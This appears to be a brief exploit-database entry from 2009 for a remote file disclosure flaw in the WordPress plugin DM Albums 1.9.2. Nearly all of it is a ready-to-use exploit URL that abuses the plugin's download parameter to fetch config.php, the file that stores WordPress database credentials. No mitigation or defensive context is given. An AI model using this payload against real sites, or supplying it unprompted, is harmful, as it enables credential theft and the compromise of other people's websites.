id: 5434
date: 06/29/2009
title: WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability
author: Stack
cves: 

=====================================================================
WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability
=====================================================================


#############################################################################################
[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability
[+] Author : Stack
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
#############################################################################################



#  0day.today [2023-03-24]  #